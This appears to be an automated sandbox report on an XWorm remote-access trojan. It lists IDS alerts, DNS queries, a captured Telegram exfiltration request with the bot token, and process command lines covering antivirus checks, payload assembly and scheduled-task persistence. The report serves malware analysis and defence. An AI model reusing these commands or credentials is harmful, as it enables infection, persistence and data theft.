VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-29T14:17:48.652355+0100 | 2853685 | ETPRO MALWARE Win32/XWorm Checkin via Telegram | 1 | 192.168.2.4 | 64427 | 149.154.167.220 | 443 | TCP
2024-10-29T14:17:59.365704+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.4 | 64431 | 193.41.226.233 | 2222 | TCP
2024-10-29T14:17:59.616383+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 193.41.226.233 | 2222 | 192.168.2.4 | 64431 | TCP
2024-10-29T14:17:59.653552+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 64431 | 193.41.226.233 | 2222 | TCP
2024-10-29T14:18:10.149694+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 193.41.226.233 | 2222 | 192.168.2.4 | 64431 | TCP
2024-10-29T14:18:10.152577+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 64431 | 193.41.226.233 | 2222 | TCP
2024-10-29T14:18:13.784635+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 193.41.226.233 | 2222 | 192.168.2.4 | 64431 | TCP
2024-10-29T14:18:13.785604+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 64431 | 193.41.226.233 | 2222 | TCP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 29, 2024 14:16:11.459862947 CET | 192.168.2.4 | 1.1.1.1 | 0x992c | Standard query (0) | nAtuEYczbaU.nAtuEYczbaU | A (IP address) | IN (0x0001) | false
Oct 29, 2024 14:16:48.175642967 CET | 192.168.2.4 | 1.1.1.1 | 0x6ff0 | Standard query (0) | 206.23.85.13.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Oct 29, 2024 14:17:46.862706900 CET | 192.168.2.4 | 1.1.1.1 | 0x7cfe | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 29, 2024 14:16:11.499665976 CET | 1.1.1.1 | 192.168.2.4 | 0x992c | Name error (3) | nAtuEYczbaU.nAtuEYczbaU | none | none | A (IP address) | IN (0x0001) | false
Oct 29, 2024 14:16:48.186403036 CET | 1.1.1.1 | 192.168.2.4 | 0x6ff0 | Name error (3) | 206.23.85.13.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Oct 29, 2024 14:17:46.871174097 CET | 1.1.1.1 | 192.168.2.4 | 0x7cfe | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• api.telegram.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 64427 | 149.154.167.220 | 443 | 3608 | C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 13:17:48 UTC | 446 | OUT | GET /bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage?chat_id=6795213026&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A3CE6FBAD6367EB17AE37%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20L9CBEH%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWORM%20v5.6 HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2024-10-29 13:17:48 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 29 Oct 2024 13:17:48 GMT
Content-Type: application/json
Content-Length: 434
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-10-29 13:17:48 UTC | 434 | IN | Data Ascii: {"ok":true,"result":{"message_id":10298,"from":{"id":7981465575,"is_bot":true,"first_name":"INCOMING VIRUS \ud83e\udda0","username":"Allyswixx_bot"},"chat":{"id":6795213026,"first_name":"Megan","type":"private"},"date":1730207868,"text":"\u2620 [XWorm V5.


                                                                                                        Target ID:0
                                                                                                        Start time:09:16:07
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Users\user\Desktop\DA92phBHUS.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\DA92phBHUS.exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:3'145'765 bytes
                                                                                                        MD5 hash:649673218A19E8FD278C99D1355949F4
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        Target ID:1
                                                                                                        Start time:09:16:07
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.bat
                                                                                                        Imagebase:0x240000
                                                                                                        File size:236'544 bytes
                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:2
                                                                                                        Start time:09:16:07
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:3
                                                                                                        Start time:09:16:08
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:tasklist
                                                                                                        Imagebase:0xcc0000
                                                                                                        File size:79'360 bytes
                                                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:4
                                                                                                        Start time:09:16:08
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:findstr /I "wrsa opssvc"
                                                                                                        Imagebase:0x590000
                                                                                                        File size:29'696 bytes
                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        Target ID:5
                                                                                                        Start time:09:16:08
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:tasklist
                                                                                                        Imagebase:0xcc0000
                                                                                                        File size:79'360 bytes
                                                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:6
                                                                                                        Start time:09:16:08
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                                                                        Imagebase:0x590000
                                                                                                        File size:29'696 bytes
                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        Target ID:7
                                                                                                        Start time:09:16:09
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:cmd /c md 438799
                                                                                                        Imagebase:0x240000
                                                                                                        File size:236'544 bytes
                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:8
                                                                                                        Start time:09:16:09
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:findstr /V "pantyhoseyourslandscapesdisposition" Flyer
                                                                                                        Imagebase:0x590000
                                                                                                        File size:29'696 bytes
                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        Target ID:9
                                                                                                        Start time:09:16:09
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:cmd /c copy /b ..\Turn + ..\Tale + ..\Intensity L
                                                                                                        Imagebase:0x240000
                                                                                                        File size:236'544 bytes
                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:10
                                                                                                        Start time:09:16:09
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\438799\Dump.pif
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:Dump.pif L
                                                                                                        Imagebase:0xe40000
                                                                                                        File size:893'608 bytes
                                                                                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000002.2973689735.0000000001473000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000002.2973689735.0000000001473000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000003.2617476989.00000000014B6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000003.2617476989.00000000014B6000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000003.2672114464.000000000151C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000003.2672114464.000000000151C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000003.2617476989.0000000001513000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000003.2617476989.0000000001513000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000003.2617544523.0000000001527000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000003.2617544523.0000000001527000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 5%, ReversingLabs
                                                                                                        Reputation:moderate
                                                                                                        Has exited:false

                                                                                                        Target ID:11
                                                                                                        Start time:09:16:09
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\choice.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:choice /d y /t 15
                                                                                                        Imagebase:0x6e0000
                                                                                                        File size:28'160 bytes
                                                                                                        MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        Target ID:12
                                                                                                        Start time:09:16:10
                                                                                                        Start date:29/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
Commandline:cmd /c schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:13
Start time:09:16:10
Start date:29/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:14
Start time:09:16:10
Start date:29/10/2024
Path:C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):true
Commandline:schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
Imagebase:0x7ff7699e0000
File size:187'904 bytes
MD5 hash:48C2FE20575769DE916F48EF0676A965
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:15
Start time:09:16:10
Start date:29/10/2024
Path:C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):true
Commandline:schtasks.exe /create /tn "ImageSyncProX" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc onlogon /F /RL HIGHEST
Imagebase:0x300000
File size:187'904 bytes
MD5 hash:48C2FE20575769DE916F48EF0676A965
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:16
Start time:09:16:10
Start date:29/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:09:16:11
Start date:29/10/2024
Path:C:\Windows\System32\wscript.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js"
Imagebase:0x7ff7fa660000
File size:170'496 bytes
MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:09:16:12
Start date:29/10/2024
Path:C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr" "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\m"
Imagebase:0x2f0000
File size:893'608 bytes
MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 5%, ReversingLabs
Has exited:true

Target ID:23
Start time:09:17:37
Start date:29/10/2024
Path:C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe
Imagebase:0xc50000
File size:65'440 bytes
MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000017.00000002.2972619420.0000000001032000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000017.00000002.2972619420.0000000001032000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000017.00000002.2973858744.000000000303A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 0%, ReversingLabs
Has exited:false


Execution Graph

Execution Coverage:17.8%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:20.7%
Total number of Nodes:1526
Total number of Limit Nodes:33
execution_graph (interactive call-graph node/edge data: function addresses and the Windows API calls reached from each)
3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3710 40141d 3520->3710 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3702 406c68 3529->3702 3707 405c3f CreateProcessW 3529->3707 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3713 406038 3546->3713 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3722 406722 lstrlenW CharPrevW 3549->3722 3729 405e50 GetFileAttributesW CreateFileW 3554->3729 3556 4035c7 3577 4035d7 3556->3577 3730 406009 lstrcpynW 3556->3730 3558 4035ed 3731 406751 lstrlenW 3558->3731 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3738 4032d2 3563->3738 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3772 403368 SetFilePointer 3565->3772 3749 403368 SetFilePointer 3567->3749 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3750 40337f 3571->3750 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3736 403336 ReadFile 3576->3736 3577->3482 
3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3813 405f51 wsprintfW 3585->3813 3814 405ed3 RegOpenKeyExW 3586->3814 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3796 403e95 3592->3796 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3820 403e74 3602->3820 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3819 406009 lstrcpynW 3620->3819 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3805 405047 OleInitialize 3626->3805 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3965 403c83 3640->3965 
3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4022 406009 lstrcpynW 3651->4022 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4023 405e50 GetFileAttributesW CreateFileW 3674->4023 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3696 406812 3683->3696 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4026 406009 lstrcpynW 3684->4026 3685->3527 3685->3529 3687 4068d3 GetVersion 3699 4068e0 3687->3699 3688 406a46 lstrlenW 3688->3696 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3699 3693 406952 GetSystemDirectoryW 3693->3699 3694 406965 GetWindowsDirectoryW 3694->3699 3695 406038 5 API calls 3695->3696 3696->3684 3696->3687 3696->3688 3696->3689 3696->3695 4024 405f51 wsprintfW 3696->4024 4025 406009 lstrcpynW 3696->4025 3697 406805 10 API calls 3697->3699 3698 4069df lstrcatW 3698->3696 3699->3692 3699->3693 3699->3694 3699->3696 3699->3697 3699->3698 3700 406999 SHGetSpecialFolderLocation 3699->3700 3700->3699 3701 4069b1 SHGetPathFromIDListW CoTaskMemFree 3700->3701 3701->3699 3703 4062fc 3 API calls 3702->3703 3704 406c6f 3703->3704 3706 
406c90 3704->3706 4027 406a99 lstrcpyW 3704->4027 3706->3529 3708 405c7a 3707->3708 3709 405c6e CloseHandle 3707->3709 3708->3529 3709->3708 3711 40139d 80 API calls 3710->3711 3712 401432 3711->3712 3712->3495 3719 406045 3713->3719 3714 4060bb 3715 4060c1 CharPrevW 3714->3715 3717 4060e1 3714->3717 3715->3714 3716 4060ae CharNextW 3716->3714 3716->3719 3717->3549 3718 405d06 CharNextW 3718->3719 3719->3714 3719->3716 3719->3718 3720 40609a CharNextW 3719->3720 3721 4060a9 CharNextW 3719->3721 3720->3719 3721->3716 3723 4037ea CreateDirectoryW 3722->3723 3724 40673f lstrcatW 3722->3724 3725 405e7f 3723->3725 3724->3723 3726 405e8c GetTickCount GetTempFileNameW 3725->3726 3727 405ec2 3726->3727 3728 4037fe 3726->3728 3727->3726 3727->3728 3728->3475 3729->3556 3730->3558 3732 406760 3731->3732 3733 4035f3 3732->3733 3734 406766 CharPrevW 3732->3734 3735 406009 lstrcpynW 3733->3735 3734->3732 3734->3733 3735->3562 3737 403357 3736->3737 3737->3576 3739 4032f3 3738->3739 3740 4032db 3738->3740 3743 403303 GetTickCount 3739->3743 3744 4032fb 3739->3744 3741 4032e4 DestroyWindow 3740->3741 3742 4032eb 3740->3742 3741->3742 3742->3565 3746 403311 CreateDialogParamW ShowWindow 3743->3746 3747 403334 3743->3747 3773 406332 3744->3773 3746->3747 3747->3565 3749->3571 3752 403398 3750->3752 3751 4033c3 3754 403336 ReadFile 3751->3754 3752->3751 3795 403368 SetFilePointer 3752->3795 3755 4033ce 3754->3755 3756 4033e7 GetTickCount 3755->3756 3757 403518 3755->3757 3759 4033d2 3755->3759 3769 4033fa 3756->3769 3758 40351c 3757->3758 3763 403540 3757->3763 3760 403336 ReadFile 3758->3760 3759->3580 3760->3759 3761 403336 ReadFile 3761->3763 3762 403336 ReadFile 3762->3769 3763->3759 3763->3761 3764 40355f WriteFile 3763->3764 3764->3759 3765 403574 3764->3765 3765->3759 3765->3763 3767 40345c GetTickCount 3767->3769 3768 403485 MulDiv wsprintfW 3784 404f72 3768->3784 3769->3759 3769->3762 3769->3767 3769->3768 3771 4034c9 WriteFile 3769->3771 3777 407312 3769->3777 3771->3759 
